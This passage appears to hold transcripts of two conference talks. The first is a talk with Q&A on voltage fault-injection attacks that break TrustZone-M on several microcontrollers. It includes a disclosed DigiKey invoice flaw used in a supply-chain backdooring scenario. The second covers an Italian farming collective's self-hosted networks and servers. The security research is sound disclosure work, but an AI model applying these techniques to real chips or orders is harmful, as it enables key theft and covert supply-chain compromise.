lengths and so on. And eventually I had a success. 
And these glitches, you will see with the glitches we released a while back, are super easy to write because all you have is like 20 lines of Python. You basically set up a loop, delay from, delay to. You set up the pulse length. You iterate over a range of pulses. And then in this case, you just check whether your GPIO is high or low. That's all it takes. And then once you have this running in a stable fashion, it's amazing how fast it works. So this is now a recorded video of a live glitch, of a real glitch, basically. And you can see we have like 20 attempts per second. And after a couple of seconds, we actually get a success indication. We just broke a chip. Sweet. But one thing, I moved to a part of Germany to the very south. It's called the Schwabenland. And I mean 60 bucks. We are known to be very cheap. And 60 bucks translates to like six beers at Oktoberfest. Just to convert this to the local currency, that's like 60 Klubmarte. Unacceptable. We need to go cheaper. Much cheaper. And so... What if we take a chip that's 57 secure, and we try to break it with the smallest chip? And so this is an 80 tiny, which costs like, I don't know, a euro or two euro. We combine it with a MOSFET to keep the comparison that's roughly three Klubmarte. And we hook it all up on a jumper board. And turns out this works. You can have a relatively stable glitch with like 120 lines of assembly running on the 80 tiny. And this will glitch your chip successfully and can break trust zone on the SEM11. The problem is, chips are very complex. And it's always very hard to do an attack on a chip that you configured yourself. Because as you will see, chances are very high that you messed up the configuration. And for example, missed the security bit, forgot to set something, and so on and so forth. But luckily, in the case of the SEM11, there's a version of this chip, which is already configured and only ships in non-secure mode. And so this is called the SEM11KPH. And so it comes pre-provisioned with a key. And it comes pre-provisioned with a trusty execution environment already loaded into the secure part of the chips. And it chips completely secured. And the customer can write and debug non-secure code only. And also you can download the SDK for it and write your own trustlets and so on. But I couldn't because it requires you to agree to their terms and conditions, which exclude reverse engineering, so no chance, unfortunately. But anyway, this is the perfect example to test our attack. You can buy these chips on DikiKey and then try to break into the secure world. Because these chips are hopefully decently secured and have everything set up and so on. And yeah, so this was the setup. We designed our own breakout board for the SEM11, which makes it a bit more accessible, has JTAC and has no capacitors in the way, so you get access to all the core voltages and so on. And you have the FPGA on the top left, the super cheap 20 bucks power supply, and a programmer. And then we just implemented a simple function that uses OpenOCD to try to read an address that we normally can't read. So we basically glitch, then we start OpenOCD, which uses the JTAC adapter to try to read secure memory. And so hooked it all up, wrote a nice script, and let it rip. And so after a while or well a couple of seconds, immediately again got successful, got a successful attack on the chip and more and more. And you can see just how stable you can get these glitches and how well you can attack this. Yeah, so sweet. Hacked. 
We can compromise the root of trust and the trusted execution environment. And this is perfect for supply chain attacks, right? Because if you can compromise a part of the chip that the customer will not be able to access, they will never find you. But the problem with supply chain attacks is that they're pretty hard to scale, they're normally only for sophisticated actors, and they're far too expensive, is what most people will tell you. Except if you hack the distributor. And so, last year or this year, I don't know, I actually found a vulnerability in DigiKey which allowed me to access any invoice on DigiKey, including the credentials you need to actually change the order. Basically the bug was that when you requested an invoice, they did not check whether you actually had permission to access it. And you have the web access ID on top and the invoice number, and that's all you need to call DigiKey and change the delivery, basically. So this is also all the data you need to reroute the shipment. I disclosed this, it's fixed, it's been fixed again afterwards, and now hopefully this should be fine, so I feel good talking about it. So let's walk through the scenario. We have Eve and we have DigiKey, and Eve builds this new super sophisticated IoT toilet and she needs a secure chip. So she goes to DigiKey and orders some SAM L11 KPHs. And here's Mallory. Mallory scans all new invoices on DigiKey, and as soon as somebody orders a SAM L11, they talk to DigiKey via the API or via a phone call to change the delivery address. And because you know who the chips are going to, you can actually target this very, very well. So now the chips get delivered to Mallory, Mallory backdoors the chips and then sends the backdoored chips to Eve, who is none the wiser, because it's the same carrier, it looks the same. You have to be very, very mindful of these types of attack to actually recognize them. And even if they open the package and try the chip and scan everything they can scan, the backdoor will be in a part of the chip that they cannot access. And so we just supply-chain-attacked whoever, using a UPS envelope basically. So yeah, an interesting attack vector. So I talked to Microchip and it's been great, they've been super nice, it was really a pleasure. I also talked to Trustonic, who were very open to this and wanted to understand it, so it was great. And they explicitly state that this chip only protects against software attacks: while it has some hardware features like tamper-resistant RAM, it is not built to withstand fault injection attacks. And if you compare different revisions of the datasheet, you can see that some of the early datasheets mentioned some fault injection resistance, and that's now gone from the datasheet. And they are also asking for feedback on making it clearer what this chip protects against, which I think is a noble goal, because we all know marketing versus engineering is always an interesting fight, let's say. Cool. First chip broken. Time for the next one, right? So the next chip I looked at was the Nuvoton M2351, which is a Cortex-M23 processor. It has TrustZone-M, and I was super excited because this one finally has an SAU, a security attribution unit, and an IDAU. And also, their marketing explicitly says it protects against fault injection. So that's awesome, I was excited, let's see how that turns out. Let's briefly talk about TrustZone on the Nuvoton chip.
So as I've mentioned before, the SAU, if it's turned off or turned on without regions, will default to fully secure. And no matter what the IDAU says, the most privileged level always wins. And so, if our entire security attribution unit says secure, our final security state will also be secure. And if we now add some small regions, the final state will also have those small non-secure regions. And I saw this, looked at how this code works, and you can see that at the very bottom SAU control is set to one. Simple, right? We glitch over the SAU enabling, all our code will be considered secure, and we'll just run our code in secure mode. No problem, is what I thought. And so basically the secure bootloader starts execution of the non-secure code, we disable the SAU by glitching over the instruction, and now everything is secure, so our code runs in the secure world. It's easy. Except: read the fucking manual. It turns out these thousands of pages of documentation actually contain useful information, and you need a special instruction to transition from secure to non-secure state, which is called BLXNS, branch with link and exchange to non-secure. This is exactly made to prevent this: it prevents accidentally jumping into non-secure code, and it will cause a secure fault if you try to do it. And what's interesting is that even if you use this instruction, it will not always transition the state: it depends on the last bit of the destination address whether the state is transitioned. And the way the bootloader actually gets the address it jumps to is from the vector table, which is basically where your reset handler and your initial stack pointer are, and so on. And you will notice that the last bit is always set. And if the last bit is set, it will jump to it as secure code. So somehow they have to branch to this address and run it as non-secure. And how do they do this? They use an explicit bit-clear instruction. What do we know about instructions? We can glitch over them. And so, with two glitches, we can glitch over the SAU control enable, so our entire memory is secure, and then we glitch over the bit-clear instruction. And then branch-with-link-and-exchange-to-non-secure, which again rolls off the tongue, will run the code as secure. And now our normal-world code is running in secure mode. The problem is: it works, but it's very hard to get stable. I somehow got it working, but it was not very stable, and it was a big pain to actually make use of. So I wanted a different vulnerability. And I read up on the implementation defined attribution unit of the M2351, and it turns out that each flash, RAM, peripheral and so on is mapped twice into memory: once as secure, for example at address 0x2000_0000, and once as non-secure, at address 0x3000_0000. So you have the flash twice and you have the RAM twice. This is super important: it is the same memory. And so I came up with an attack that I call CrowRBAR, because a vulnerability basically doesn't exist if it doesn't have a fancy name. And the basic point of this is that the security of the system relies on the region configuration of the SAU. But we can glitch this initialization, combined with this IDAU layout; again, the IDAU mirrors the memory, once as secure and once as non-secure. Now let's say we have, at the very bottom of our flash, a secret which is in the secure area. It will also be in the mirror of this memory.
But again, because our SAU configuration is fine, it will not be accessible from the non-secure region. Now, the start of this non-secure area is configured by the RBAR register. And so maybe, if we glitch this RBAR being set, we can increase the size of the non-secure area. And if you check the ARM documentation on the RBAR register, the reset value of this register is unknown. So unfortunately it doesn't just say zero, but I tried this on all the chips I had access to, and it's zero on all the chips I tested. And so now what we can do is glitch over this RBAR write, and now our final non-secure area will be bigger. Our secure code is still running in the bottom half, but then the jump into non-secure will also give us access to the secret. And it works. We get a fully stable glitch; it takes roughly 30 seconds to bypass it. I should mention that this is what I think happens. All I know is that I inject the glitch and I can read the secret. I cannot tell you exactly what happens, but this is the best interpretation I have so far. So, woohoo, we have an attack with a cool name. And then I looked at another chip, the NXP LPC55S69. This one has two Cortex-M33 cores, one of which has TrustZone-M. The IDAU and the overall TrustZone layout seem to be very similar to the Nuvoton. And I got the dual-glitch attack working and also the CrowRBAR attack working. And the vendor response was amazing. Like, holy crap, they called me and wanted to fully understand it, they reproduced it, they got me on the phone with an expert. And the expert was super nice, but what it came down to was RTFM. Again, this is a long document, but it turns out that the example code did not enable a certain security feature. And this security feature is helpfully named the miscellaneous control register, basically, which obviously stands for secure control register. And this register has a bit which, if you set it, enables secure checking. And if I had read just a couple of sentences further when I read about TrustZone on the chip, I would have actually seen this, but, millennial, sorry. And what this enables is called the memory protection checkers. This is an additional memory security check that gives you finer-grained control over the memory layout. It basically checks whether the attribution unit security state is identical to the memory protection checker security state. And so, for example, if our attack code tries to access memory, the MPC will check whether this was really a valid request, so to say, and stop you, if you are unlucky, as I was. But it turns out it's glitchable too, just much, much harder to glitch, and you need multiple glitches. And the vendor response was awesome; they are also, as I heard, working on improving the documentation for this. So yeah, super cool. It's still not a full protection against glitching, but it gives you a certain level of security, and I think that's pretty awesome. Before we finish: is everything broken? No. These chips are not insecure. They are just not protected against a very specific attack scenario. Align the chips that you want to use with your threat model. If fault injection is part of your threat model, for example because you're building a car key, maybe you should protect against glitching. If you're building a hardware wallet, you should definitely protect against glitching. Thank you.
Also, by the way, if you want to play with some awesome fault injection equipment, I have an EMFI glitcher with me and so on, so just hit me up on Twitter and I'm happy to show it to you. So, thanks a lot. Thank you very much, Thomas. We have an awesome 15 minutes for Q&A. So if you line up, we have three microphones. Microphone number three actually has an induction loop, so if you're hearing impaired and have a suitable device, you can go to microphone three and actually hear the answer. And we're starting off with our signal angel with questions from the Internet. Hello, Internet. Hello. Are you aware of the ST Cortex-M4 firewall, and can your research be somehow related to it, or do you maybe have plans to explore it in the future? Yes, I'm very aware of the STM32F4. If you watched our talk last year at CCC, called wallet.fail, we actually exploited the sister chip, the STM32F2. The F4 has this strange firewall thing which feels very similar to TrustZone-M. However, I cannot yet share any research related to that chip. Unfortunately, sorry. Thank you. Microphone number one, please. I'm just wondering, have you tried to replicate this attack on multi-core CPUs with higher frequencies, such as 2 GHz, and if not, how would you go about that? I have not, because there are no TrustZone-M chips with that frequency. However, people have done it on mobile phones and other equipment. There are a lot of materials on glitching higher-frequency stuff, but it gets expensive really quickly, because a scope on which you can even see a 2 GHz clock costs as much as a nice car. Microphone number two, please. Thank you for your talk. Is the firmware functionality to go from non-secure to secure defined by CMSIS, or are there proprietary libraries from NXP or others? So the veneer stuff is standard, and you will find ARM documents basically recommending you to do this, but all the toolchains, for example the one for the SAM L11, will generate the veneers for you. And so, I have to be honest, I have not looked at how exactly they are generated. However, I did some Rust stuff to play around with it, and yeah, it's relatively simple for the toolchain, and it's standard. The signal angel is signaling. Yeah, that's not a question from the internet but from me: I wanted to know how important hardware security is in comparison to software security, because you cannot hack these devices without having physical access to them, except for this supply chain attack. Exactly. And that depends on your threat model. Basically, if you build a hardware wallet, you want to have hardware protection, because somebody can potentially steal it very easily. And if you, for example, look at your phone, you probably don't want anyone at customs to be able to immediately break into your phone, and that's another point where hardware security is very important. And with the car key it's the same: if you rent a car, the car rental company hopefully doesn't want you to copy the key. And interestingly, probably one of the most protected things in your home is your printer cartridge, because I can tell you that the vendor invests a lot of money into you not being able to clone the printer cartridge. And so there are a lot of cases where it's maybe not the user who wants to protect against hardware attacks, but the vendor who wants to protect against them. Microphone number one, please. So thank you again for the amazing talk.
You mentioned higher-order attacks, I think, twice. And for the second chip you actually said you broke it with two glitches, two exploitable glitches. Yes. So what did you do to reduce the search space? Or did you just search over the entire space? So the nice thing about these chips is that, if you have a security attribution unit, you can decide when you turn it on. So I had a GPIO go up, then I enabled the SAU, and then my search space was very small, because I knew it would be just after I pulled up the GPIO. And so I was able to very precisely time where I glitched. And because I wrote the code that does it, I could almost count on the oscilloscope which instruction I'm hitting. All right. Thank you. Next question from microphone number two, please. Yeah, thank you for the talk. I was just wondering, if the vendor were to include the capacitor directly on the die, how fixed would you consider it to be? So against voltage glitching it might help, it depends. But for example, on a recent chip, we just used negative voltage to suck the power out of the capacitor. And you also have EMFI glitching as a possibility. And EMFI glitching is awesome because you don't even have to solder: you just put a small coil on top of your chip and inject the voltage directly into it, behind any of the capacitors and so on. So it helps, but often it's not done for security reasons, let's say. Next question, again from our signal angel. Did you get to use your own custom hardware to help you? Partially. The part that worked is in the summary. Microphone number one, please. Hi, thanks for the interesting talk. All these vendors pretty much said this sort of attack is not really in scope for what they're doing. Yes. Are you aware of anyone in this sort of category of chip actually doing anything against glitching attacks? Not in this category, but there are secure elements that explicitly protect against it. A big problem with researching those is that it's also, to a large degree, security by NDA, at least for me, because I have no idea what's going on and I can't buy one to play around with. And so I can't tell you how good these are, but I know from some friends that there are some chips that are very good at protecting against glitches. And apparently the term you need to look for is a glitch monitor. If you see that in the datasheet, it tells you that they at least thought about it. Number two, please. So what about the brownout detection on that Microchip part? Can you say why it didn't catch your glitching attempts? It's not made to catch glitching attacks, basically. A brownout detector is mainly there to keep your chip stable. So for example, if your supply voltage drops, you want to make sure that you notice and don't accidentally glitch yourself. For example, if it's running on a battery and your battery goes empty, you want your chip to run stable, stable, stable, off. That's the idea behind a brownout detector, as far as I understand. But yeah, they are not made to be fast enough to catch glitching attacks. Do we have any more questions from the hall? Yes. Yes, where? Thank you for your amazing talk. You have shown that it gets very complicated if you have two consecutive glitches. So wouldn't it be an easy protection to just do the stuff twice or three times, and maybe randomize it? Would you then consider it impossible to glitch?
So adding randomization to the point in time where you enable it helps, but then you can trigger off the power consumption and so on. And I should add, I only trigger once and then use just a simple delay. But in theory, if you do it twice, you could also glitch based on the power consumption signature and so on. So it might help, but somebody very motivated will probably still be able to do it. Okay, we have another question from the internet. Is there a mitigation for such an attack that I can do at the PCB level, or can it be addressed only at chip level? Only at chip level, because if you have a heat gun, you just pull the chip off and do it in a socket, or if you do EMFI glitching, you don't even have to touch the chip, you just go over it with the coil and inject directly into the chip. So the chip needs to be secured against this type of stuff. Or you can add a tamper protection case around your chip. So yeah. Another question from microphone number one. So I was wondering if you've heard anything or know anything about the STM32L5 series? I've heard a lot. I've seen nothing. So yes, I've heard about it, but it doesn't ship yet, as far as I know. We are all eagerly awaiting it. Thank you. Microphone number two, please. Okay, very good talk, thank you. Will you release all the hardware designs of the board and the scripts? Yes. Is there anything already available, even if, as I understood, it's not all finished? Yes, so on chip.fail (the .fail domains are awesome) you can find the source code of our glitcher. I've also ported it to the Lattice and I need to push that, hopefully in the next few days. And then all the hardware will be open sourced as well, because it's based on open source hardware. And yeah, I'm not planning to make any money or anything with it, it's just to make life easier. Microphone number two, please. So you already said you don't really know what happens at the exact moment of the glitch, and you were lucky that you skipped an instruction. Do you maybe have a feeling for what is happening inside the chip at the moment of the glitch? So I asked this precise question, what exactly happens, of multiple people, and I got multiple answers. But basically my understanding is that you pull down the voltage that it needs, for example, to set a register. But it's absolutely out of my domain to give an educated comment on this. I'm a breaker, unfortunately not a maker, when it comes to chips. Microphone number two, please. Okay, thank you. You talked a lot about chip attacks. Can you tell us something about JTAG attacks? So, just having a connection to JTAG? Yeah. So for example, the attack on the KPH version of the chip was basically a JTAG attack: I used JTAG to read out the chip, but I only had JTAG in the normal world. However, on a lot of chips it's possible to re-enable JTAG even if it's locked. And for example, again referencing last year's talk, we were able to re-enable JTAG on the STM32F2, and I would assume something similar is possible on this chip as well. But I haven't tried. Are there any more questions? We still have a few minutes. I guess not. Well, a big warm round of applause for Thomas Roth.
Most modern embedded devices have something to protect: Whether it's cryptographic keys for your bitcoins, the password to your WiFi, or the integrity of the engine-control unit code for your car. To protect these devices, vendors often utilise the latest processors with the newest security features: From read-out protections, crypto storage and secure-boot up to TrustZone-M on the latest ARM processors. In this talk, we break these features: We show how it is possible to bypass the security features of modern IoT/embedded processors using fault-injection attacks, including breaking TrustZone-M on the new ARMv8-M processors. We are also releasing and open-sourcing our entire soft- and hardware toolchain for doing so, making it possible to integrate fault-injection testing into the secure development lifecycle. Modern devices, especially secure ones, often rely on the security of the underlying silicon: Read-out protection, secure-boot, JTAG locking, integrated crypto accelerators or advanced features such as TrustZone are just some of the features utilized by modern embedded devices. Processor vendors are keeping up with this demand by releasing new, secure processors every year. Often, device vendors place significant trust in the security claims of the processors. In this talk, we look at using fault-injection attacks to bypass security features of modern processors, allowing us to defeat the latest chip security measures such as TrustZone-M on the new ARMv8-M processors. After a quick introduction to the theory of glitching, we introduce our fully open-source FPGA platform for glitching: An FPGA-based glitcher with a fully open-source toolchain & hardware, making glitching accessible to a wider audience and significantly reducing the costs of getting started with it - going as far as being able to integrate glitch-testing into the Secure Development Lifecycle of a product. Then, we look at how to conduct glitching attacks on real-world targets, beyond academic environments, including how to prepare a device for glitching and how to find potential glitch targets. Afterwards, we demonstrate fault-injection vulnerabilities we found in modern, widely-used IoT/embedded processors and devices, allowing us to bypass security features integrated into the chip, such as:
- Re-enabling locked JTAG
- Bypassing a secure bootloader
- Recovering symmetric crypto keys by glitching the AES implementation
- Bypassing secure-boot
- Fully bypassing TrustZone-M security features on some new ARMv8-M processors
We will also demonstrate how to bypass security features and how to break the reference secure bootloader of the Microchip SAM L11, one of the newest TrustZone-M enabled ARM Cortex-M processors, using roughly $5 of equipment. After the talk, PCBs of our hardware platform will be given out to attendees.
10.5446/53150 (DOI)
Welcome everybody to our next talk, infrastructure in a horizontal farmers' community. I guess one thing that all of us have in common is that we are all in special communities. We want to build better communities, we want to build better infrastructure and we want to build better technology. Be it in a little hackerspace in Sweden, or in a theatre group in France, or in an NGO in Germany, that is something that unites us all. And our next speaker, Andrea, is giving us some insights into their farming community in Italy, because she has 15 years of experience with that. So I think we can all learn quite a lot. Andrea is a self-taught web developer, she graduated in communication sciences, she is also a cook and she is part of a group of radical farmers. So I would say she is a little bit of everything, a jack of all trades, so she is the best person to give us some insights. So please welcome Andrea with a big warm round of applause and enjoy the talk. Thank you very much. Thanks to you, to everyone, for being here. It will be difficult to fit into 30 minutes the experience and the interactions between a lot of different communities, not only this experience in Bologna. But okay, I will speak about Campi Aperti. Campi Aperti means open fields in Italian, and I come from Bologna. Okay, Bologna: if you imagine that this is Italy, it's here, Bologna. I'm speaking about growing vegetables, growing organic food. This is a community of farmers, a community of people that reclaim the right to grow our food and to decide how the territories, the land, the countryside are transformed. And so it's direct action. There are some demands, we are asking for some laws to change, but we are not waiting for these laws in Italy to change: we do the stuff directly. And the stuff is survival for farmers, because the problem is that the only laws that exist in Italy are for food transformation, for making pizza, bread, beer and so on, and they are made only for industrial production. For the production of the farmer there are no laws: you can't do direct selling. But this group of farmers does it anyway, and so they take political action in the street, in the square, and the most visible thing they do is these organic markets. But it's not only this, it's political stuff, and it has its background and its roots in radical anti-capitalist groups and in the global movement of the 90s. So where does this stuff happen? It happens in places that are free, because you couldn't ask, at the beginning 15 years ago, and probably now it's even more difficult, you can't ask the municipality to start this kind of market. And they found good ground in squares, in streets, in places that are managed by human agreement, not by law. And so Campi Aperti was born in 2003 in XM24, in Bolognina, which is an occupied, shared public space, self-managed by a community. It's not a service: it's a place where the needs of the community and the answers to these needs find a resolution. This place is under the threat of eviction, and we support it a lot; these places are really, really important for our life. So, I told you where, and I want to also tell you when; the how comes after. The time. Time is an important thing. The time of capitalism is thought in hours and money, and it's fast. But this is shaped on an egocentric idea, and it's not the only way to think about time. For farmers it's much easier to think that time is cyclical.
Not in an egocentric, human-centred way. And so they are used to planning things and to making seasonal agreements, seasonal planning. And so the first thing, to rethink our life and our community, is to take our time: our time to grow relationships, our time to think about how to do things, and our time, when we buy something, to think about where the stuff we buy and eat comes from, how it was produced, and which community and which territories it comes from. Okay. This is a GIF that you will find in the slides; if you go and check after this talk, you can also see a video, in Creative Commons for sure, but right now I don't have the time to show our action in a video. I want to explain the infrastructure a bit. The infrastructure is based on human agreement. The group of Campi Aperti started with five people in an occupied public space, and they started with a small market. Then it grew: now there are more than 150 farmers, with thousands of people that come to the markets and are co-producers of the products. And so we manage ourselves by assemblies, and we do things with the consensus method. The topics are food autonomy, being independent with our food, and safeguarding the territories, so practising agroecology. And we have a shared warranty. The group of farmers does not accept the centralized warranty for organic food from the state; they practise a shared warranty. It means that every one of the producers at the market takes care of the products of the others too, and takes care of the relationships. But this also means that if you break the trust with the others, you go out of the community. And this looks difficult to decide, but it's not so difficult, because when you are local and you know the products that you grow and how organic they are, it's easy to decide this stuff. The way we explain it to technical people: it's like not trusting a certification authority, but basing yourself on a web of trust. And so we also include in our relationships, in our work, a sense of limits and mutualism. So we plan not to grow too much, but to grow only locally. And we divide the assemblies: there are assemblies for each market, and there are eight of them every month; there is a global assembly, all together, every two months; and an assembly every two months locally, for each valley. They are based on a formal consensus method. This means that we train ourselves to stay in the consensus area. We know that agreements are based on a balance between relationships and knowledge. We come from different knowledge, because we are specialized in different things, and we have to grow our relationships together. So we try to stay in this area of consensus, knowing that we have different knowledge but high trust. We don't want to stay in unanimity, we don't want to always agree all together, because there are a lot of risks in that area. In this area you grow diversity; in that one you are building echo chambers, and in the place of unanimity you can easily make mistakes. In the other one you find low trust and different knowledge, so you end up in dissent. And if you have low relationships, so low trust, but full agreement on what you want for the future, the only thing you can do is make a technical agreement together, so write really specific rules. But we don't do that: we want agreements and guidelines, and the other stuff is done by trust, one with the other. So, I told you that we use a formal consensus method.
It means that in these distributed meetings we have shared agreements. We start from a common ground, which is that every assembly has a written report: at the beginning of every assembly we choose a reporter, or more than one, because sometimes there are global assemblies that start in the morning and finish in the evening. And we have a timekeeper for the speakers. And we decided to put into our agreements the right to listen and to be listened to, and no meta-conversation over the topic: everyone speaks only for herself. Okay. We need to communicate. And when we started to think about communication, we spoke with another community that knows the stuff about communication better than us. And we found them, and we knew them, because we shared the same political ideas: Hackmeeting. Hackmeeting is a community in Italy that is anti-fascist, anti-racist and anti-sexist, and it was born in the 90s as well, that community. Every year they meet in a different occupied space in Italy. They are for freedom in communication, with a critical view of technologies. So we asked, and we discovered a lot of self-managed servers. And the first tool that we implemented, in 2004, was our website, and we started with a lot of mailing lists. The first tool was mailing lists, and then, to communicate outside the group, we started with this website hosted by Autistici/Inventati, which is one of the oldest self-managed servers in Italy, close to us, with a strong view about anonymity and privacy, oriented towards the user. Communication is really, really important in groups that live in the countryside: you live on different farms, far from each other. And so it happened that, to use the mailing lists, people needed connectivity. And what happens? If you base your connectivity on commercial companies out in the countryside, you discover that you are too far from the city and they don't earn enough to bring connectivity to your community. And so we started to explore how to resolve this problem, and we discovered that there exists a community that has thought about this stuff, and that there exists the PicoPeering Agreement. And in Italy we met the Ninux community, who shared with us and taught us how to set up mesh networks. And so I'll show you a few photographs. Our infrastructure is small and grows really slowly, and it's based on our own hardware. There are 15 people that want to stay connected with each other, and they understood that a radio link is nice: it's really light, it uses 5 GHz antennas to make point-to-point connections. And so the cost to learn, to build and to maintain that network is an effort that they can manage. And we also found more technical people to help. It's like helping to install Linux, but here we install OpenWrt, and afterwards people know how to maintain and take care, in freedom, of their PC, and in this case their antenna. We also use proprietary hardware where we change the firmware, we use TP-Link and Ubiquiti, but we are switching to an open hardware project, the LibreRouter. And as software we use LibreMesh, libremesh.org, which is a project that is a bundle of configurations on top of OpenWrt, and it uses different protocols like babeld and BATMAN-adv. But their aim is to make things easier for the user, and they do. So we have a blog, antenna.noblogs.org, where we keep the documentation of this stuff. We think a lot about technology, about why we adopt a technology. And so we started to develop a feminist view of technologies.
It means that we think that every technology is an effort. When someone tells you that a technology is smart, sometimes they are not considering the entire life cycle of that technology. And so, looking at the technologies that everyone at this moment is advertising, hey, use this, it's easy, we think: stop. Stopping is a better way, and think about what we are doing. So we think it's important not to do things alone, because you become the single point of failure of your community. To be resilient you need to do the stuff with more people, not start if you are alone, and mix proficient people with newbies. Contemplate the possibility of making mistakes, and build a testing environment before putting things into production. Document everything, to explain the choices you made, and give yourself and the others the time to study, and don't become too specialized: specialization easily brings people to burnout. It's better if you train yourself in more than one topic and share knowledge with the others, rather than going too deep into one topic, because you lose the whole view of why you are doing something. You are not paid for this stuff in a community: it's a need of the community and a richness for everyone in your community, in our view, in the way we do things. So we start from our needs. We started to speak about our digital data in 2016. This is a meeting of Genuino Clandestino, the bigger network of self-organized farmers in Italy: there are a lot of different communities that grow vegetables and do direct selling in shared public spaces. We started to speak about our digital data, and we decided that we don't want to put it in Google, Amazon, Facebook, Microsoft or Apple space. We are anti-GAFAM, because we are against the big distribution of food and also the big distribution of data. We think that in this moment it's really important to take care of our intimacy and our data. So we decided to set up a server and run our own self-hosted services. And we spent one year finding a virtual private server, a digital place, that shared our policies. And we found it in France, in Toulouse: Tetaneutral.net, which is inside a bigger federated network, the French Data Network federation. They are really important for us because they do good work, they are for net neutrality and for freedom of access to the internet, with a budget based on donations from the community. We also spent a lot of time finding, inside our community of farmers, a sysadmin, and we found one, and we started to use Nextcloud, as free software, to host our data. And we decided to start using it only for administrative work, only for 10 people in the group, and to decide afterwards whether this tool is okay for our needs or not. If it's not, we will see, and we are still in time to go back and not use it. But at the moment things are running well. And we store in this cloud the cards about our farmers, because everyone who wants to enter Campi Aperti needs to be visited by another farmer, to know how they grow the vegetables and how they do the organic stuff. And so we write these dossiers about ourselves, and that's why the website was not enough anymore: we needed a private place to store this stuff, and also to decentralize and distribute the tasks we have to do. And so, after this one year of testing, we are planning how to grow. Okay, if all the stuff is going well, we decide how to grow. And so, again, we decided not to do this stuff alone.
We looked around at communities near us, and we decided again to adopt something that is already used by a community that is anti-fascist, anti-racist and anti-sexist, which is Autistici/Inventati. They changed their infrastructure this year and moved to a containerized infrastructure, where the host-specific configuration, the configuration that you can share with others, and the software are kept separate. All three of these are managed by a minimalistic container orchestrator called float. And we find this solution interesting, also because we studied the other possible solutions a bit, and we saw that at this moment there is huge software, also open source, that can solve this problem, but it is developed and used by huge open source companies and doesn't really fit our needs. So we are interested in this software because it gives static service allocation. Some of these features look like non-features for the needs of companies, but we are a community, so we have different needs. So, how it works, quickly, because we are at the CCC and I have to show you something technical. We have specific and generic configuration that we version with Git, and we use Ansible to manage our configuration. The software, so the generic part, is built by the continuous integration that we have on Autistici/Inventati, which builds the Docker images into a Docker registry. And then float, running our Ansible playbooks, deploys the different Docker images onto the different machines. Why is it good for us? Because we can version all the stuff, so we can also make mistakes and go back, and we can deploy on a virtual machine where we can do testing, and on the real machine for real production. That's it, I think. Why do we plan to adopt it? Because we don't want to stay on a virtual machine, we would like to move to bare metal. We trust the group. This orchestrator is only about 1000 lines of Python code and it's written as an Ansible plugin. And we can use two-factor authentication, Universal 2nd Factor, which is good for us because your security can be based on a hardware token, so you have your security in something local that you have to keep. And there is some integrated monitoring, like Prometheus and Grafana. And there is this feature that the services go down when something fails, and this is important for us: we are not a company that has to stay up 24 hours, we are a community that wants to know if something goes wrong with your machine and if someone physically put their hands on your machine. And yeah, now it's time for questions. Slowly please, the questions, because I don't speak English really well, as you can see, and I also don't understand it really well. And this is the long list of thanks, and all the communities that I spoke about. There is also the Eclectic Tech Carnival, which is a feminist community that pushed me a lot to come here and explain this stuff to you. And thanks. Thank you very much for the great talk. It was very, very interesting. We still have 10 minutes for questions and answers. If you have questions, just move to the three microphones in the room, and then we are going to have you ask your question. So we start with microphone number two. Very slow in English, please. Thank you very much for the talk. I have a question: the customers, do they pay in advance for a year, or do they pay at the market? Okay, in Bologna, in Campi Aperti, the experience is direct selling at the market.
So the co-producer, the consumer, pays at the moment. But we know that this is not the only model, and there are other experiments in the city in which Campi Aperti and this group of farmers are involved. There is also Arvaia, another group, where the consumers pay in advance, have a share, also work in the fields, and take boxes every week. And there is another project, Camilla, which is based on membership: you are a member and you have to work three hours every month in the market, and this market is open to all the people who are members. So the city is experimenting, but for Campi Aperti you do not pay in advance; in other projects you do. Is it okay if I ask something else? Well, I would first take microphone number three, but if you just stay there, I feel like there will still be time for another question. So microphone number three, please. Yes, I have a question about consensus. You mentioned that some level of disagreement is not only acceptable, but maybe good, because if everyone agrees, then there is no discussion, no development, and less trust. But what level of disagreement is acceptable? Have you tried different models, like, how do you achieve this consensus? Yes, we think that disagreement is important, to not hide the problems. So we pay attention to not saying, at the end of a conversation, "we all agree" if, for example, someone has more doubts. And we have a formal way of doing consensus. So, to be sure that we all agree, we do what we call an orientation. That means that you can divide the group into three positions: active consensus; consensus with doubts, where you think that the trust is enough, so you agree, but you will not be active in doing the stuff; and active dissent, which means that you think the decision being taken is against the principles. And if you put yourself in that position, you have to explain it to all the others, and we have to do the orientation again. But if more than 20% of the people stay in active dissent, we have to re-discuss everything, so it becomes a block. Great, thanks for the explanation. That was very interesting. Microphone number two again. Thank you for your talk. I wanted to ask whether you have any mechanism to help people that want to become farmers, especially to acquire new land? A project existed, but it's not active anymore. We are sad that it's not active anymore, because this project was started by people that had this need, and after they found land they said, okay, we don't have the time anymore, and we haven't found anyone to put time into that project again. And so there is not a real process in which we help people to become farmers. But, for example, the mailing list is open: anyone who participates in the market can join the mailing list and also the assemblies, the meetings. And so a lot of the time people ask for space in the countryside and find information that way. And the other thing that really makes the change is that a lot of people come to Campi Aperti asking only to do transformation, to only process the food. And this is not acceptable in Campi Aperti: people cannot only transform the food. We do practices for being independent from capitalism for our food, so you can't ask only to transform. And so we ask these people to start a project, to grow vegetables and become farmers. And in this way active collaborations started with groups of farmers that already exist, and so more people started to live in the countryside. Thank you very much.
Next up we have a question from the Internet. You seem to have gone really far in doing a lot of things yourself. Do you still rely on a lot of mainstream technologies, or did you reimplement everything yourself? Is everything self-made, or do you still rely on some mainstream technologies? Is there something that you use that is mainstream, capitalist, that everybody else uses too? You mentioned that you don't use Google or Facebook or something; apart from that, is there something mainstream that you still use, that you rely on? We are not monopolistic. We have our basic communication on independent infrastructure, but some of it we are not running directly ourselves: it runs on Autistici. We are based on self-managed servers, communities that share our political views, so in that sense we are not running the service ourselves. To communicate we use the website and the mailing lists, so we have our independent communication. But we do not forbid people among us from also using commercial tools or commercial social networks. It's only that we don't trust too much that that way of communication will be really useful when we need it. Another question from microphone number two, please. Hi, thank you for your presentation. In your presentation you mentioned dossiers written by farmers about other farmers, and farmers visiting other farmers. I wanted to ask, what kind of information do they collect and how is it used? What is the purpose of the dossier and what information do they collect? It is the protocol of the shared warranty. A person that wants to enter Campi Aperti can ask, from the website, to be visited, and starts to fill in a form, to fill in these cards. Then these cards go to the assembly of that valley, the valley where this farmer comes from, which decides when to do the visit. The visit is then reported at the next assembly, and those who did the visit say whether what this person wrote in the card is true or not. And so also here you have the weight of trust, of how much you trust the words of a person that asked to enter. And we store these cards, these dossiers, and we print them, and we put them physically on the stall when people do the market. Because it's really important that 